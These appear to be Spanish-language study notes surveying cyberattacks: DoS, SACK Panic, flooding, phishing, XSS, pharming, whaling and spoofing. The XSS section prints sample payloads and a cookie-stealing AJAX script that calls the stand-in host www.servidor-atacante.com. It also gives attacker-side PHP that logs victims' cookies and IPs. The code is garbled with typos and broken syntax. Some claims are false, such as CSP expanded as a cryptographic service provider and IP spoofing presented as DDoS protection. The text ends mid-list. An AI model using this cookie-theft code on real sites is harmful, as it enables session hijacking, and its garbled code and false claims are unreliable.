ATAQUES INFORMATICOS

(CIBERATAQUES)

ATAQUE DoS y DDoS: En seguridad informática, un ataque de denegación

de servicio, llamado también ataque DoS (por sus siglas en inglés, Denial Of
Service), es un ataque a un sistema de computadoras o red que causa que un
servicio o recurso sea inaccesible a los usuarios legítimos. Normalmente
provoca la perdida de la conectividad con la red por el consumo del ancho de
la red de la víctima o sobrecarga de los recursos computacionales del sistema
atacado.
Los ataques DoS se generan mediante la saturación de los puertos con
múltiples flujos de información, haciendo que el servidor se sobrecargue y no
pueda seguir prestando su servicio. Por eso se le denomina denegación, pues
hace que el servidor no pueda atender la cantidad enorme de solicitudes. Esta
técnica es usada por los crackers o piratas informáticos para dejar fuera de
servicio servidores objetivo. A nivel global, este problema ha ido creciendo,
en parte por la mayor facilidad para crear ataques y también por la mayor
cantidad de equipos disponibles mal configurados o con fallos de seguridad
que son explotados para generar estos ataques. Una ampliación del ataque
DoS es el llamado ataque de denegación de servicio distribuido, también
llamado DDos, el cual se lleva a cabo generando un gran flujo de información
desde varios puntos de conexión hacia un mismo punto de destino. La forma
más común de realizar un DDoS es a través de una red de Bots, siendo esta
técnica el ciberataque más usual y eficaz por su sencillez tecnológica.
En ocasiones, esta herramienta ha sido utilizada como un buen método para
comprobar la capacidad de tráfico que un ordenador puede soportar sin
volverse inestable y afectar a los servicios que presta. Un administrador de
redes puede así conocer la capacidad real de cada máquina.
Kernel Panic/SACK Panic (Pánico en el Núcleo) Linux : Manipulando el
Tamaño Máximo de Segmento y la Retransmisión (redes de datos), pueden
ser usador de manera remota para causar un ataque de denegación de servicios
por medio de un desborde de entero en el núcleo Linux, incluso causando un
Kernel Panic. La vulnerabilidad más crítica bautizada SACK Panic y
etiquetada con CVE-2019-11477 debe su nombre a los paquetes de
reconocimiento selectivo (SACK). Este protocolo se define en el RFC 2018
(Request For Comments) y RFC 2883, y trata de solventar el problema de
las transmisiones innecesarias de paquetes durante una conexión TCP
(Transmission Control Protocol) En español: Protocolo de Control de
Transmisión.
El Kernel Panic es un mensaje mostrado por el núcleo de un sistema
operativo una vez detectado un error interno del sistema del cual no se puede
recuperar. Los Kernel Panic usualmente proveen información de depuración
que es útil solo para los desarrolladores del sistema operativo.
Flood: Es un término en ingles que significa literalmente inundación se usa
para designar un comportamiento abusivo de la red de comunicaciones,
normalmente por la repetición desmesurada de algún mensaje en un corto
espacio de tiempo.
Un Flood consiste en enviar mucha información en poco tiempo a alguien
para intentar saturar su red. La manera de aprovechar esto en los chats,
consiste en enviar muchas peticiones de información a la víctima, de forma
que esta, al contestar, supere el límite del servidor y este lo eche. Desde la
creación de los foros, la palabra Flood se ha extendido a usarse en ellos de
igual forma, o sea, refiriéndose a la acción de postear de forma muy seguida
con el fin de dejar el servidor inoperativo.
También la inundación es un mecanismo de difusión de la información en
grupos de nodos conectados aleatoriamente. Si un nodo quiere difundir un
mensaje, se lo envía a todos sus vecinos que a su vez se lo reenviaran a todos
sus vecinos y así hasta que el mensaje llegue a todos los nodos de la red. El
algoritmo garantiza que el mensaje llega a todos los nodos en el menor tiempo
posible, a costa de utilizar una cantidad desproporcionada de ancho de banda.
Phishing: Es un conjunto de técnicas que persiguen el engaño a una víctima
ganándose su confianza haciéndose pasar por una persona, empresa o servicio
de confianza (Suplantación de Identidad de tercero de confianza), para
manipularla y hacer que realice acciones que no debería realizar (por ejemplo,
revelar información confidencial o hacer un click en un enlace).
Para realizar el engaño, habitualmente se hace uso de la ingeniería social
explotando los instintos sociales de la gente, como es de ayudar o ser
eficiente. También mediante la adulación de la víctima, explotando su
intrínseca cantidad o necesidad de ser reconocido, baja autoestima, o una
persona que busca trabajo. Por ejemplo, enviando correos electrónicos o
mostrando publicidades a la víctima diciéndote que ha ganado un premio y
que siga un enlace para recibirlo, siendo aquellas promesas falsas (un cebo).
Habitualmente el objetivo es robar información, pero otras veces es instalar
malware, sabotear sistemas, o robar dinero a través de fraudes. El Phishing
está considerada una de las técnicas de robos de contraseñas más utilizadas.
Cross-Site Scripting (XSS): Es una secuencia de comandos en sitios
cruzados o Cross-Site Scripting es un tipo de vulnerabilidad informática o
agujero de seguridad típico de las aplicaciones Web, que puede permitir a una
tercera persona inyectar en páginas web visitadas por el usuario código
JavaScript o en otro lenguaje similar. Se puede evitar usando medidas como
CSP (Proveedor de Servicios Criptográficos). Es posible encontrar una
vulnerabilidad de Cross-Site Scripting en aplicaciones que tengas entre sus
funciones presentar información en un navegador web u otro contenedor de
páginas web. Sin embrago, no se limita a sitios web disponibles en internet, ya
que puede haber aplicaciones locales vulnerables a XSS, o incluso el
navegador en sí.
XSS Es un vector de ataque que puede ser utilizado para robar información
delicada, secuestrar sesiones de usuario, y comprometer el navegador
subyugando la integridad del sistema. Las vulnerabilidades XSS han existido
desde los primeros días de la Web.
Esta situación es habitualmente causada al no validar correctamente los datos
de entrada que son usados en cierta aplicación, o no sanear la salida
adecuadamente para su presentación como página Web.
Esta vulnerabilidad puede estar presente en las siguientes formas:
*Directa: (También llamada Persistente): Este tipo de XSS comúnmente
filtrado, y consiste en insertar código HTML peligroso en sitios que permitan
incluyendo si etiquetas como script o iframe.
*Indirecta: (También llamada Reflejada): Este tipo de XSS consiste en
modificar valores que la aplicación web utiliza para variables entre dos
páginas, sin usar sesiones y sucede cuando hay un mensaje o una ruta en la
URL del navegador, en una cookie, o cualquier otra cabecera HTTP (en
algunos navegadores y aplicaciones Web, esto podría extenderse al DOM
(Document Object Model) del navegador).
XSS INDIRECTO (Reflejado): Supongamos que un sitio web tiene la
siguiente forma:
https://www.example.com/home.asp?frame-menu.asp
y que al acceder se creara un documento HTML enlazando con un frame a
menu.asp. Este ejemplo. ¿Qué pasaría si se pone como URL del frame un
código JavaScript?
Javascript:while(1)alert(“Este mensaje saldrá indefinidamente”);
Si este enlace lo pone un atacante hacia una víctima, un visitante podrá verlo
y vera que es del mismo dominio, suponiendo que no puede ser nada malo y
de resultado tendrá un bucle infinito de mensajes.
Un atacante en realidad trataría de colocar un script que robe las cookies de la
víctima, para después poder personificarse como con su sesión, o hacer
automático el proceso con el uso de la biblioteca cURL o alguna similar. De
esta forma, al recibir la cookie, el atacante podría ejecutar acciones con los
permisos de la víctima sin siquiera necesitar su contraseña.
Otro uso común para estas vulnerabilidades es lograr hacer Phishing. Quiere
ello decir que la víctima ve en la barra de direcciones un sitio, pero realmente
está en otra. La victima introduce su contraseña y se la envía al atacante.
Una página como la siguiente:
Error.php?error=Usuario%20Invalido
Es probablemente vulnerable a XSS indirecto, ya que si escribe en el
documento “Usuario invalido”, esto significa que un atacante podría insertar
HTML y JavaScript si así se lo desea.
Por ejemplo, un tag como <script> que ejecute código JavaScript, cree otra
sesión bajo otro usuario y mande la sesión actual al atacante.
Para probar vulnerabilidades de XSS en cookies, se puede modificar el
contenido de una cookie de forma sencilla, usando el siguiente script.
Solamente se debe colocar en la barra de direcciones, y presionar “Enter”
Javascript:voidprompt(“Introduce la cookie”,document.cookie).replace(/[;]
+/g,function(_){document.cookie-_:});
XSS Directo (Persistente): Funciona localizando puntos débiles en la
programación de los filtros de HTML si es que existen, para publicar
contenido (como blogs, foros, etc.).
Normalmente el atacante tratara de insertar tags como <iframe>, o <script>,
pero en caso de fallar, el atacante puede tratar de poner tags que casi siempre
están permitidas y es poco conocida su capacidad de ejecutar código. De esta
forma el atacante podría ejecutar código malicioso.
Ejemplos: Una posibilidad es usar atributos que permiten ejecutar código.
<BR STYLE=“behavior: url(http://yoursite/xss.htc);”>
<DIV STYLE=“background-image: url(javascript:alert(´XSS´))”>
<IMG SRC=X ONERROR=alert(/XSS/)”>
AJAX: Usar AJAX para ataques de XSS no es tan conocido, pero si
peligroso. Se basa en usar cualquier tipo de vulnerabilidad XSS para
introducir un objeto XMLHttps y usarlo para enviar contenido POST.GET.
Sin conocimiento del usuario.
Este se ha popularizado con gusanos de XSS que se encargan de replicarse
por medio de vulnerabilidades de XSS persistentes (aun que la posibilidad de
usar XSS reflejados es posible).
El siguiente script de ejemplo obtiene el valor de las cookies y seguidamente
las enviaría al atacante.
Javascript:
Var cookiesDeUsuario = document.cookie;
Var xhr = new XMLHttpRequiest(); // Objeto Ajax
Xhr.open(¨GET¨. ¨www.servidor-atacante.com/cookies.php¨);
Xhr.send(´c=¨ + cookiesDeUsuario);

PHP (Servidor el atacante)

<?php
$archivo = fopen(‘log2.htm´,´a´);
$cookie = $_GET[‘c’];
$ip = getenv (´REMOTE_ADDR’);
$RE = $HTTPREFERRER;
$fecha=date(“j F, Y, g:i a);
Fwrite($archivo, ‘<br />cookie: ‘ .htmlentities($cookie).’ <br />Pagina: ‘
htmlentities($re));
Fwrite($archivo, ‘<br /> IP: ‘ .$ip. ‘<br/> fecha y hora: ‘ .$fecha. ‘ </br>’);
Fclose($archivo);
¿>
Pharming: Es un tipo de ciberataque que se desarrolló a partir del Phishing.
El atacante que implementa esta técnica, por decirlo de esta manera, intenta
redirigir el tráfico Web, especialmente los datos de solicitud, a un sitio web
fraudulento. Esto se logra explotando vulnerabilidades de software en los
sistemas de nombre de dominio (DNS) o en los equipos de los propios
usuarios, que permiten a atacantes redirigir el nombre del dominio a otra
maquina distinta. De esta forma, un usuario que introduzca un determinado
nombre de dominio que haya sido redirigido, accederá en su explorador de
internet a la página web del atacante haya especificado.
Todos los ordenadores conectados a internet tienen una dirección IP única,
que consiste en un numero de 32 bits, representando como 4 octetos de 0 a
255 se parador por un punto.
Debido a la dificultad que supondría para los usuarios tener que recordar las
direcciones IP de servicios específicos surgieron los Nombres de Dominio a
los que se les puede asociar direcciones IP. Un atacante de Pharming
remplaza la dirección IP de un sitio web por otra, de un sitio malicioso que es
generalmente controlado por el atacante.
Los ataques de Pharming pueden realizarse de dos formas: reemplazando la
IP en uno o varios servidores DNS, lo que afectaría a todos sus usuarios, o
atacando a ordenadores concretos, mediante la modificación del fichero hosts,
presente en cualquier sistema Microsoft Windows o Unix, y en casi cualquier
equipo moderno en general.
La técnica de Pharming se utiliza normalmente para realizar ataques de
Phishing, redirigiendo el nombre de dominio de una entidad de confianza a
una página web, en apariencia idéntica, pero que en realidad ha sido creada
por el atacante para obtener los datos privados del usuario generalmente datos
bancarios.
Whaling: Es un tipo de ataque de Phishing. Suele dirigirse a personas de alto
rango en una empresa – directores generales, directores de operaciones y
presidentes- y emplean tácticas más avanzadas y sofisticadas que otros tipos
de amenazas.
En lugar de enviar correos electrónicos masicos a muchas personas o
empresas, los atacantes de Whaling cuentan con una investigación y
plantificación previa y están dirigidos a organizaciones específicas. Se utilizan
nombres, direcciones, cargos u otra información personal para crear una
apariencia más sólida y creíble para el ataque.
El objetivo del Whaling es convencer a los objetivos para que compartan
credenciales, o bien acceder a redes más valiosas o simplemente robar dinero
o datos. Para ello estos ciberataques incitan a los lideres a enviar o transferir
dinero a los estafadores o revelar información sensible como contraseñas y
nombres de usuario que desbloqueen propiedad intelectual de una empresa.
A medida que las organizaciones van reforzando la información en materia de
seguridad, los hackers se ven obligados a buscar tácticas más sofisticadas para
sus ataques. A diferencia de los correos electrónicos de phishing normales, los
de Whaling han ido adoptando características específicas para evitar ser
detectados, entre ellas:
 Terminología profesional y centrada en el mundo empresarial
 Conocimiento preciso del sector
 Direcciones de correo electrónico, páginas web y páginas de destino
falsificadas
 Información personal, referencias y anécdotas
Utilizando técnicas de ingeniería social, los hackers combinan varias
características con contenidos específicos y mensajes urgentes para animar a
los destinatarios a actuar con rapidez. Muchos ataques de Whaling incluyen
detalles como direcciones falsas que se hace pasar por las de las personas de
confianza, páginas de destino detalladas, características personalizadas como
el nombre o el cargo del objetivo y llamadas telefónicas de seguimiento.
Spoofing: Es una práctica ilegal que consiste en suplantar la identidad
electrónica de una persona para ocultar la suya propia. Esta mascará les
permite cometer delitos online sin temer las consecuencias, ya que nadie
podrá saber cuál es su verdadero nombre, Existen 9 tipos de Spoofing:
 Spoofing de Correo Electrónico
El Email Spoofing es una forma de Phishing muy extendida que consiste en el
envío de correos electrónicos haciendo pasar por un remitente falso. Este tipo
de Spoofing busca engañar a los remitentes del correo par que faciliten datos
privados, contraseñas, o incluso para que realiccen pagos con sus tarjetas de
crédito o débito.
Sabemos que es prácticamente imposible dejar de utilizar el correo
electrónico, sobre todo si trabajas en remoto.
 Spoofing Web
El Spoofing web es una forma de Phishing mediante la cual un atacante
replica una web legitima para hacerse pasar por ella y tratar de obtener
beneficios mediante su suplantación. Las webs falsas pueden replicar portales
legítimos de entidades bancarias, tiendas online, hoteles o agencias de viajes.
Los usuarios engañados pueden facilitarles sus datos de acceso o bancarios, lo
que permite al hacker consumar su estafa.
 ARP Spoofing
El ARP Spoofing es una forma sofisticada de Spoofing con la que los hackers
acceden a una red LAN e interceptan los paquetes de datos que pasan a través
de ella. Se trata de un tipo de ataque muy peligroso porque permite al hacker
recibir y enviar mensajes dirigidos a una IP especifica, lo que le permite
realizar ataques de intermediario de la red.
 DNS Spoofing
El DNS Spoofing es similar al ARP Spoofing, solo que acostumbra a darse en
torno al router en lugar de en las redes LAN. El DNS Spoofing permite al
hacker hacerse pasar por el servidor DNS que utiliza el router para obtener las
direcciones IP a las que quiere acceder el usuario, de forma que el hacker
queda en una posición perfecta para recibir las peticiones del usuario,
modificar respuestas y realizar un ataque de intermediario.
 IP Spoofing
A diferencia de los tipos de Spoofing anteriores, el IP Spoofing puede
utilizarse como forma de protección frente a ciberataques y, de hecho, es la
herramienta idónea para prevenir un ataque DDos. Este es el tipo de Spoofing
al que puede accederse gracias a una VPN. El IP Spoofing nos permite
conectarnos a internet a través de una IP diferente a la nuestra IP real, lo que
impide a posibles atacantes dirigir ataques DDos contra nuestra IP y, además
nos
 GPS Spoofing
 Caller ID Spoofing
 Ataque de Man-in-the-middle (MitM)
 Facial Spoofing